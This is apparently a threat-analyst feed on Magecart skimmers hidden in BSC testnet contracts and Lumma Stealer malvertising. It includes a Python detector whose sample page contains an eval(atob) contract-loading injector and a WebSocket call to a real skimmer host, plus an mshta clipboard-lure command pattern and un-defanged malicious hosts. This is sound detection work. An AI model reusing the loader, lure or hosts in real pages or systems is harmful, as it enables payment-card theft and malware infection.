ThreatCat.ch
@threatcat-ch.bsky.social
ThreatCat.ch was founded in autumn 2022 and consists of a bunch of experienced Cyber Threat Analysts and Incident Responders who have been working together for many years.
Decoding gives us another WebSocket-based communication channel: wss://cdn[.]iconstaff[.]top/common?source=

Domain iconstaff[.]top was already reported as being Magecart-related in June 2024: blog.sucuri.net/2024/06/caes...
Decoding the Caesar Cipher Skimmer
February 28, 2025 at 4:21 PM
Let’s take transaction 0x863f7[…] at Sep-02-2024 02:34:55 PM UTC – we get the following decoded JS:
testnet.bscscan.com/tx/0x863f748...
February 28, 2025 at 4:21 PM
Another confirmation of the malicious, Magecart-related activity can be found by analyzing other activities from the main BSC testnet contract 0x5178a932d5b312801e02c43fd50399a88028b9d0
testnet.bscscan.com/address/0x51...
February 28, 2025 at 4:21 PM
This assumption is reinforced when we get a further obfuscated payload from suckerity[.]xyz when visiting the checkout page, and subsequently notice a client-to-server data exfiltration after having entered credit card details (small extract of the ~200KB deobfuscated code)
February 28, 2025 at 4:21 PM
The contract’s content is clearly malicious and connects over WebSocket to suckerity[.]xyz (behind Cloudflare); it is not related to #ClearFake, but reminds us of #Magecart-related injections:
February 28, 2025 at 4:21 PM
While investigating an infected website, we noticed a call to BSC testnet contract 0x0967296defa0fd586c9ede5730380e2b059fab95: testnet.bscscan.com/address/0x09...
February 28, 2025 at 4:21 PM
By the way, Google-based malvertisement is still going strong – also delivering #Lumma / #LummaStealer currently from hXXps://sites.google[.]com/view/gglchor then chrome.downloading[.]icu
January 7, 2025 at 6:33 AM
The command it copies to the clipboard has the following string structure:
mshta [URL] # Decoy comment to look genuine to the user and hide the previous commands in the Run prompt

This command starts a long chain of PowerShell commands, leading finally to #LummaStealer
January 6, 2025 at 8:51 PM
The infection hides as a base64-encoded & obfuscated JavaScript directly on the home page. It gets the overlay from a smart contract and injects it into the HTML.
January 6, 2025 at 8:51 PM
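As an added detection example (this is not code from ThreatCat.ch or from any project mentioned in the posts), the following Python script inspects inline script blocks for the two traits described in the January thread above (a base64-wrapped loader that pulls its payload from a BSC testnet contract via eth_call) and in the February Magecart thread (a WebSocket channel to a known skimmer host). The sample HTML, the loader text and the RPC host name pattern are constructed for the example; the contract addresses and the two hostnames are the ones quoted in the posts, re-fanged here only so they can be matched.

```python
import base64
import re

# Indicators quoted in the ThreatCat.ch posts above. The hosts are defanged in
# the posts ("suckerity[.]xyz"); they are written plainly here for matching.
KNOWN_CONTRACTS = {
    "0x0967296defa0fd586c9ede5730380e2b059fab95",
    "0x5178a932d5b312801e02c43fd50399a88028b9d0",
}
KNOWN_WS_HOSTS = {"suckerity.xyz", "cdn.iconstaff.top"}

# Generic traits of the technique (heuristics assumed by this example):
# a BSC public RPC host name, a JSON-RPC eth_call, or any WebSocket URL.
BSC_RPC_RE = re.compile(r"data-seed-prebsc|bsc-testnet|bsc-dataseed|bnbchain\.org", re.I)
ETH_CALL_RE = re.compile(r"eth_call|contract\.methods\.", re.I)
WS_URL_RE = re.compile(r"wss?://[^\s'\"<>]+", re.I)
HEX_ADDR_RE = re.compile(r"0x[0-9a-fA-F]{40}")
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)


def decode_b64_blobs(text):
    """Yield each long base64 run in text that decodes to mostly printable text."""
    for m in B64_BLOB_RE.finditer(text):
        blob = m.group(0)
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
        except Exception:
            continue
        decoded = raw.decode("utf-8", errors="ignore")
        if decoded and sum(ch.isprintable() for ch in decoded) / len(decoded) > 0.9:
            yield decoded


def ws_host(url):
    """Host part of a ws:// or wss:// URL, lower-cased."""
    return re.sub(r"^wss?://", "", url, flags=re.I).split("/")[0].split(":")[0].lower()


def scan_html(html):
    """Return findings for each inline script (and each base64 layer inside it)."""
    findings = []
    for idx, script in enumerate(SCRIPT_RE.findall(html)):
        # layer 0 is the script as served; later layers are decoded base64 blobs
        layers = [script] + list(decode_b64_blobs(script))
        for depth, code in enumerate(layers):
            reasons = set()
            if BSC_RPC_RE.search(code):
                reasons.add("bsc_rpc_endpoint")
            if ETH_CALL_RE.search(code):
                reasons.add("eth_call")
            for addr in HEX_ADDR_RE.findall(code):
                if addr.lower() in KNOWN_CONTRACTS:
                    reasons.add("known_contract:" + addr.lower())
            for url in WS_URL_RE.findall(code):
                host = ws_host(url)
                tag = "known_ws_host:" if host in KNOWN_WS_HOSTS else "websocket:"
                reasons.add(tag + host)
            if reasons:
                findings.append({"script": idx, "layer": depth, "reasons": sorted(reasons)})
    return findings


# Constructed sample page (not real captured content): script 0 is a base64-
# wrapped loader that asks a BSC testnet RPC node for the contract's content and
# injects it; script 1 opens the skimmer's WebSocket channel; script 2 is benign.
SAMPLE_LOADER = (
    'var rpc="https://data-seed-prebsc-1-s1.bnbchain.org:8545";'
    'var c="0x0967296defa0fd586c9ede5730380e2b059fab95";'
    'fetch(rpc,{method:"POST",body:JSON.stringify({jsonrpc:"2.0",method:"eth_call",'
    'params:[{to:c,data:"0x"},"latest"],id:1})}).then(r=>r.json())'
    '.then(j=>document.body.insertAdjacentHTML("beforeend",atob(j.result)));'
)
SAMPLE_HTML = (
    "<html><body>"
    "<script>eval(atob('" + base64.b64encode(SAMPLE_LOADER.encode()).decode() + "'))</script>"
    '<script>var s=new WebSocket("wss://cdn.iconstaff.top/common?source=checkout");</script>'
    "<script>console.log('benign');</script>"
    "</body></html>"
)

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(finding)
```

Run it against a saved copy of a suspect home page; the "layer" field tells you whether the hit was visible in the served script or only after decoding a base64 blob, which is exactly the hiding step the post describes. The host and RPC patterns are heuristics and will also match legitimate dApp front-ends, so treat a "websocket:" or "bsc_rpc_endpoint" hit alone as a lead and the known-contract or known-host hits as the confirmation.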
Another related GitHub repo: github.com/AlexanderRPa... involving domain streammain[.]top hosted on 89.169.13[.]147. All identified GitHub repos were reported.
GitHub - AlexanderRPatton/cdn
September 30, 2024 at 3:28 PM
Investigating further, we find yet another GitHub repository, gavnoman/gootraf, which is gone but seems to have redirected users toward awardbonus[.]shop at 147.45.197[.]80
September 30, 2024 at 2:29 PM
This domain points toward yet another GitHub account started on July 2nd, 2024 - github.com/lolngnos/loles. Both domains currently resolve to 77.221.155[.]81 (alias painful-underwear.aeza[.]network (!), hosted at AEZA).
GitHub - lolngnos/loles
September 30, 2024 at 2:29 PM
A closer look into bitbucket.org/goo2/adss/sr... reveals the domain support-wp[.]shop in the commit log
September 30, 2024 at 2:29 PM
3. In JavaScript files, with a reference to a GitHub repository with very similar code
September 30, 2024 at 2:29 PM
2. In JavaScript files, with a reference to a Bitbucket repository
September 30, 2024 at 2:29 PM
1. Directly into the page’s HTML at the top
September 30, 2024 at 2:28 PM